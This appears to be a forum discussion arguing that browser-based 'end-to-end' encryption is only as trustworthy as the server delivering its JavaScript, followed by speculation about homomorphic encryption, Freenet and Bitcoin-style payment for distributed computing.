If you aren't doing the encryption yourself, you aren't using end-to-end encryption. People need to start realizing this and stop trusting companies implicitly because they say they are end-to-end encrypting something. End-to-end encryption has been partially redefined by the industry to include things that are transport encrypted all the way. This still gives the central servers access to the data, even if they do not log said data. If they theoretically can read the data, they can be compelled to by CALEA (Compelled Assistance to Law Enforcement Act) in the US, and other laws abroad. Something to note, this also applies to web based local encrypted services using Javascript such as bitcoin wallets, cloud based password managers, Mega, and things such as Google's described attempt at end-to-end encrypted email. Since everything is happening in Javascript which isn't executed by the server, it is definitely being served to you by the server. That means, a simple insertion of some code that logs your password and sends it to their server once and in limited deployment to certain users they will be able to retrieve your password. Unless you review every single piece of Javascript executing on your client every single time you execute the code, you cannot ever fully ensure this is not happening on any of these services.
Which is why we need open source tools that are vetted by the community. No one can actually track everything that is run on their browser, so the best we can do is to outsource it to people we trust.
Sort of. Even if the product is open source, it is possible that the installation of said source is modified to include malware or injected Javascript. Even if they provide a way to "view" the code that is currently executed on the server, that viewer itself could filter the code to not show the exploit code. On top of which, any number of other software could be running looking at the process' memory or the database, etc, at the same time if the code is running on a remote server. So, open source tools that are run on your machine and distributed and vetted by a third party would be effective. Which is the entire design of the Linux operating system and distribution based package management. However, this has problems with mass storage. This tends to be why so many security people are researching distributed systems and homomorphic encryption. If we get to the point that we can execute code and not know what the code is we are executing or not know what data is being accessed by a particular individual, we will be at a point that we can effectively remove the service providers (MITM) from the equations. Unfortunately, everyone still thinks the cloud is going to save their lives and solve their problems, and the convenience of the backups at the moment and the convenience of testing and developing smaller codebases on cloud platforms makes testing an idea and its popularity much easier. At the moment it takes a ton of work to create your own distributed system, so the next step after homomorphic encryption is standardized is to move to the point that we have platforms to use such encryption. The next step in distributed systems is a method or platform to have one network run a bunch of services, rather than the current systems such as BitTorrent/ and Bitcoin which only really run one concept. People hijack the blockchain to do other things, but these are hacks and layers on top of the Bitcoin protocol. It was not designed to support multiple projects. Freenet is a great example of what can be done (encrypted distributed content), but has a couple of major flaws. First, it's insanely slow, so speed is an issue that needs to be solved. Second, there is no processing distribution, it's just content. Homomorphic encryption designed versions of Freenet would be an interesting platform to experience. Freenet is also a great example of showing the limitations of designs of such entirely closed off systems. Right now, the only issue it has is storage space, since it is just essentially distributed storage content. In the enhanced processing version, it would also have to reserve CPU space on your machine that you have no idea what is being used to calculate. This is a problem in the sense that it is easily abusable by dipshits, and dipshits will always exist. The network could be taken down or slowed down significantly by a spammer that just calculates out "1+1" over and over and over again. That problem is something I don't know is possible to resolve since you effectively don't know what's being executed, so how could you know what processing to filter? So a combination would have to come into play. An adaptation of Bitcoin could be used to monetize your processing and require payment to run a process. The processor could even receive money as if they had just mined a Bitcoin, and this would need to be verifiable. This could require two different simultaneous networks as one is a processing network and one is a verification network. This would reduce the effectiveness of spam on the network. There are two major problems with this system, though. You would effectively be providing a generic service to process anything as long as you paid. The major media moguls could easily pump 0.1% of their profits into spamming networks such as these, since it would effectively slow down the network and would probably be legal to do. Even if it became illegal to do, they could disguise their processing as some sort of analytical work that they wish to do on the network that they really don't care about. So in the ideal world, we have eliminated these media moguls through mass adoption of the protocols and migrated 99% of the internet over to these systems. Well, the processing requirements needed to admin such a system would be a considerable overhead, so any regular processing work (the way we do it now), would be the best way to market "superdeeduperfastspeeds". Most people would buy into that because guess what, it would be legitimately faster, then the network starts to erode toward these systems, and then those systems make enough profit to funnel money into slowing down the mesh system again. I love researching these systems but the practicality of these systems taking hold is difficult. Bitcoin is clearly here to stay, which is good, but so far I can only imagine small applications such as these that are low bandwidth/processing requirements to take hold. Massive database systems in such an encrypted closed off network would just tank the network. So, if someone can solve the massive security problems of encrypted homomorphic mesh networks, that would be akin to an enhanced robotic Satoshi Nakamoto level researcher. Then again, with AI getting out there, we might be able to actually build an AI system that solves this problem for us. Not a "thinking" AI system, but a system that uses learning techniques to solve a narrow, specific security goal. The state of the internet and the developed protocols over the next 20 years is going to be fascinating to watch.
That's good to know - both that Mega isn't safe and that Kim Dotcom will always have our backs.